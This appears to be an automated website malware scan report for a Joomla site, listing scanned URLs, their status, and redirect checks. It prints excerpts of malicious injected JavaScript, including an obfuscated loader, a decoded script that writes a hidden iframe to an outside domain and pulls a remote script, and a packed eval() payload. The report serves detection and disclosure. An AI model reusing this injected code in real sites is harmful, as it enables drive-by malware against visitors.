Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gootoon.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://gootoon.net/ | 200 OK Content-Length: 11071 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4051 bytes skipped]... | ||
http://gootoon.net/media/system/js/caption.js | 200 OK Content-Length: 3549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://gootoon.net/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 1667 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: online1you.com if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict(); ;var O0l='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADMJhCZslGaDRmblBHch5yTx8kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9AyTx8EIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ3c0V2Z/8SbvNmL0BXayN2chZXYqJ3b0F2YzVnZi9mLpBXYv8iOwRHdodCI9AyYyNnLwATSKsTKnQHcpJ3YzdCK05WZ ...[1263 bytes skipped]... Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O ...[656 bytes skipped]... | ||
http://gootoon.net/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 11155 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)<36?c.toString(36):String.fromCharCode(c+29))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'\\w{1,2}'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(7($){6 P=7(A,B){6 C=$.extend({},$.fn.22.2s,B);7 D(a){17 a?a.replace(/ /g,\'%20\'):\'\'};6 E={V:0,14:\'\',1q:0,R:\'\',1r:Y,23:Y,1v:Y,2t:Y};6 F=$(A);F.1g(\'9:1B\',E);F. Antivirus reports:
| ||
http://gootoon.net/index.php?option=com_content&view=category&id=1&Itemid=2 | 200 OK Content-Length: 14108 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4574 bytes skipped]... | ||
http://gootoon.net/index.php?option=com_content&view=section&layout=blog&id=2&Itemid=3 | 200 OK Content-Length: 17976 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4314 bytes skipped]... | ||
http://gootoon.net/index.php?option=com_content&view=section&id=4&Itemid=9 | 200 OK Content-Length: 8588 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4700 bytes skipped]... | ||
http://gootoon.net/test404page.js | 404 Not Found Content-Length: 481 Content-Type: text/html | clean |
http://gootoon.net/index.php?view=article&catid=2%3Alearning-room&id=6%3Aroom&format=pdf&option=com_content&Itemid=3 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://gootoon.net/index.php?view=article&catid=2%3Alearning-room&id=6%3Aroom&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=3 | 200 OK Content-Length: 9246 Content-Type: text/html | clean |
http://gootoon.net/index.php?option=com_mailto&tmpl=component&link=61189a30daacdfa08ddd9cdd53cc5336ca6c21ca | 200 OK Content-Length: 2882 Content-Type: text/html | clean |
http://gootoon.net/index.php?option=com_content&view=article&id=13:-qr-code&catid=1:2011-02-02-09-38-42&Itemid=2 | 200 OK Content-Length: 14702 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.learndream.gootoon.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="joomla, ...[4200 bytes skipped]... | ||
http://gootoon.net/index.php?view=article&catid=1%3A2011-02-02-09-38-42&id=13%3A-qr-code&format=pdf&option=com_content&Itemid=2 | 200 OK Content-Length: 90 Content-Type: text/html | clean |
http://gootoon.net/index.php?view=article&catid=1%3A2011-02-02-09-38-42&id=13%3A-qr-code&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=2 | 200 OK Content-Length: 6678 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gootoon.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 00:25:58 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 00:25:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3a4ce03644125270e0f734bfbffeba92=99uaegqtt466fkkk3e5i733av5; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: gootoon.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 00:25:58 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 18 Dec 2014 00:25:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3a4ce03644125270e0f734bfbffeba92=99uaegqtt466fkkk3e5i733av5; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: gootoon.net
Referer: http://www.google.com/search?q=gootoon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gootoon.net
Referer: http://www.google.com/search?q=gootoon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.